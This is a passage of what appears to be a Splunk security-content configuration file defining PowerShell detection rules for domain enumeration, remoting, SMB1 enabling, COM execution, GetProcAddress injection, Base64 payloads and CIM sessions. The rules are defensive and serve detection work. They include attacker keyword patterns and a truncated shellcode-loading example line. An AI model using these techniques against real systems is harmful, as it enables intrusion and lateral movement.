*","*dioavp *","*dscrptsc *","*dbaf *","*dbm *") by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_disable_security_monitoring_filter` [ESCU - PowerShell Domain Enumeration - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies specific PowerShell modules typically used to enumerate an organizations domain or users. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies specific PowerShell modules typically used to enumerate an organizations domain or users. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = It is possible there will be false positives, filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Domain Enumeration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Hermetic Wiper", "Malicious PowerShell", "CISA AA23-347A", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains domain enumeration command in $ScriptBlockText$ with EventCode $EventCode$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 42}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Domain Enumeration - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Malicious PowerShell", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies specific PowerShell modules typically used to enumerate an organizations domain or users. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = PowerShell Domain Enumeration action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*) | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_domain_enumeration_filter` [ESCU - PowerShell Enable PowerShell Remoting - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic utilizes PowerShell Script Block Logging (EventCode 4104) to identify the use of Enable-PSRemoting cmdlet. This cmdlet allows users to enable PowerShell remoting on a local or remote computer, which allows other computers to run commands on the target computer. The ability to remotely execute commands can be abused by attackers to take control of compromised systems and pivot to other systems on the network. By detecting the use of Enable-PSRemoting cmdlet via script block logging, this analytic can help organizations identify potential malicious activity related to attackers attempting to gain remote control of compromised systems. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic utilizes PowerShell Script Block Logging (EventCode 4104) to identify the use of Enable-PSRemoting cmdlet. This cmdlet allows users to enable PowerShell remoting on a local or remote computer, which allows other computers to run commands on the target computer. The ability to remotely execute commands can be abused by attackers to take control of compromised systems and pivot to other systems on the network. By detecting the use of Enable-PSRemoting cmdlet via script block logging, this analytic can help organizations identify potential malicious activity related to attackers attempting to gain remote control of compromised systems. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Note that false positives may occur due to the use of the Enable-PSRemoting cmdlet by legitimate users, such as system administrators. It is recommended to apply appropriate filters as needed to minimize the number of false positives. action.escu.creation_date = 2023-03-22 action.escu.modification_date = 2023-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Enable PowerShell Remoting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running a Invoke-PSremoting on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Enable PowerShell Remoting - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.001", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText="*Enable-PSRemoting*" | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `powershell_enable_powershell_remoting_filter` [ESCU - Powershell Enable SMB1Protocol Feature - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious enabling of smb1protocol through `powershell.exe`. This technique was seen in some ransomware (like reddot) where it enable smb share to do the lateral movement and encrypt other files within the compromise network system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027", "T1027.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious enabling of smb1protocol through `powershell.exe`. This technique was seen in some ransomware (like reddot) where it enable smb share to do the lateral movement and encrypt other files within the compromise network system. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the powershell logs from your endpoints. make sure you enable needed registry to monitor this event. action.escu.known_false_positives = network operator may enable or disable this windows feature. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Enable SMB1Protocol Feature - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = Powershell Enable SMB1Protocol Feature on $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Enable SMB1Protocol Feature - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027", "T1027.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious enabling of smb1protocol through `powershell.exe`. This technique was seen in some ransomware (like reddot) where it enable smb share to do the lateral movement and encrypt other files within the compromise network system. action.notable.param.rule_title = Powershell Enable SMB1Protocol Feature action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*Enable-WindowsOptionalFeature*" ScriptBlockText = "*SMB1Protocol*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_enable_smb1protocol_feature_filter` [ESCU - Powershell Execute COM Object - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a COM CLSID execution through powershell. This technique was seen in several adversaries and malware like ransomware conti where it has a feature to execute command using COM Object. This technique may use by network operator at some cases but a good indicator if some application want to gain privilege escalation or bypass uac. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a COM CLSID execution through powershell. This technique was seen in several adversaries and malware like ransomware conti where it has a feature to execute command using COM Object. This technique may use by network operator at some cases but a good indicator if some application want to gain privilege escalation or bypass uac. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = network operrator may use this command. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Execute COM Object - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains COM CLSID command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Execute COM Object - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.015", "T1546", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a COM CLSID execution through powershell. This technique was seen in several adversaries and malware like ransomware conti where it has a feature to execute command using COM Object. This technique may use by network operator at some cases but a good indicator if some application want to gain privilege escalation or bypass uac. action.notable.param.rule_title = Powershell Execute COM Object action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*CreateInstance([type]::GetTypeFromCLSID*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_execute_com_object_filter` [ESCU - Powershell Fileless Process Injection via GetProcAddress - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies `GetProcAddress` in the script block. This is not normal to be used by most PowerShell scripts and is typically unsafe/malicious. Many attack toolkits use GetProcAddress to obtain code execution. \ In use, `$var_gpa = $var_unsafe_native_methods.GetMethod(GetProcAddress` and later referenced/executed elsewhere. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1055", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies `GetProcAddress` in the script block. This is not normal to be used by most PowerShell scripts and is typically unsafe/malicious. Many attack toolkits use GetProcAddress to obtain code execution. \ In use, `$var_gpa = $var_unsafe_native_methods.GetMethod(GetProcAddress` and later referenced/executed elsewhere. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Limited false positives. Filter as needed. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Fileless Process Injection via GetProcAddress - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains GetProcAddress API in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Fileless Process Injection via GetProcAddress - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1055", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. \ This analytic identifies `GetProcAddress` in the script block. This is not normal to be used by most PowerShell scripts and is typically unsafe/malicious. Many attack toolkits use GetProcAddress to obtain code execution. \ In use, `$var_gpa = $var_unsafe_native_methods.GetMethod(GetProcAddress` and later referenced/executed elsewhere. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Powershell Fileless Process Injection via GetProcAddress action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText=*getprocaddress* | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_fileless_process_injection_via_getprocaddress_filter` [ESCU - Powershell Fileless Script Contains Base64 Encoded Content - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `FromBase64String` within the script block. A typical malicious instance will include additional code. \ Command example - `[Byte[]]$var_code = [System.Convert]::FromBase64String(38uqIyMjQ6rG....` \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1027", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `FromBase64String` within the script block. A typical malicious instance will include additional code. \ Command example - `[Byte[]]$var_code = [System.Convert]::FromBase64String(38uqIyMjQ6rG....` \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives should be limited. Filter as needed. action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Fileless Script Contains Base64 Encoded Content - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Hermetic Wiper", "Malicious PowerShell", "Winter Vivern", "AsyncRAT", "Data Destruction", "IcedID", "NjRAT"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains base64 command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$ action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Fileless Script Contains Base64 Encoded Content - Rule action.correlationsearch.annotations = {"analytic_story": ["Hermetic Wiper", "Malicious PowerShell", "Winter Vivern", "AsyncRAT", "Data Destruction", "IcedID", "NjRAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1027", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies `FromBase64String` within the script block. A typical malicious instance will include additional code. \ Command example - `[Byte[]]$var_code = [System.Convert]::FromBase64String(38uqIyMjQ6rG....` \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.notable.param.rule_title = Powershell Fileless Script Contains Base64 Encoded Content action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*frombase64string*" OR ScriptBlockText = "*gnirtS46esaBmorF*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_fileless_script_contains_base64_encoded_content_filter` [ESCU - PowerShell Get LocalGroup Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies the use of `get-localgroup` being used with PowerShell to identify local groups on the endpoint. During triage, review parallel processes and identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic identifies the use of `get-localgroup` being used with PowerShell to identify local groups on the endpoint. During triage, review parallel processes and identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2021-09-14 action.escu.modification_date = 2021-09-14 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Get LocalGroup Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Get LocalGroup Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=powershell.exe OR Processes.process_name=cmd.exe) (Processes.process="*get-localgroup*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `powershell_get_localgroup_discovery_filter` [ESCU - Powershell Get LocalGroup Discovery with Script Block Logging - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies PowerShell cmdlet - `get-localgroup` being ran. Typically, by itself, is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \ This analytic identifies PowerShell cmdlet - `get-localgroup` being ran. Typically, by itself, is not malicious but may raise suspicion based on time of day, endpoint and username. \ During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2022-04-26 action.escu.modification_date = 2022-04-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Powershell Get LocalGroup Discovery with Script Block Logging - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Powershell Get LocalGroup Discovery with Script Block Logging - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText = "*get-localgroup*" | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest, UserID as user | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `powershell_get_localgroup_discovery_with_script_block_logging_filter` [ESCU - PowerShell Invoke CIMMethod CIMSession - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies the use of the New-CIMSession cmdlet being created along with the Invoke-CIMMethod cmdlet being used within PowerShell. This particular behavior is similar to the usage of the Invoke-WMIMethod cmdlet, which is known for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. The New-CIMSession cmdlet allows users to create a new CIM session object for a specified computer system, which can then be used to execute CIM operations remotely. Similarly, the Invoke-CIMMethod cmdlet is used to invoke a specified method on one or more CIM objects. Therefore, the combination of New-CIMSession and Invoke-CIMMethod cmdlets in PowerShell can potentially indicate malicious behavior, and this analytic can help detect such activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies the use of the New-CIMSession cmdlet being created along with the Invoke-CIMMethod cmdlet being used within PowerShell. This particular behavior is similar to the usage of the Invoke-WMIMethod cmdlet, which is known for executing WMI commands on targets using NTLMv2 pass-the-hash authentication. The New-CIMSession cmdlet allows users to create a new CIM session object for a specified computer system, which can then be used to execute CIM operations remotely. Similarly, the Invoke-CIMMethod cmdlet is used to invoke a specified method on one or more CIM objects. Therefore, the combination of New-CIMSession and Invoke-CIMMethod cmdlets in PowerShell can potentially indicate malicious behavior, and this analytic can help detect such activity. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = False positives may be present based on third-party applications or administrators using CIM. It is recommended to apply appropriate filters as needed to minimize the number of false positives. action.escu.creation_date = 2023-03-22 action.escu.modification_date = 2023-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - PowerShell Invoke CIMMethod CIMSession - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Malicious PowerShell", "Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = PowerShell was identified running a Invoke-CIMMethod Invoke-CIMSession on $Computer$. action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - PowerShell Invoke CIMMethod CIMSession - Rule action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText IN ("*invoke-CIMMethod*", "*New-CimSession*") | stats count min(_time) as firstTime max(_time) as lastTime by Computer EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_invoke_cimmethod_cimsession_filter` [ESCU - PowerShell Invoke WmiExec Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The 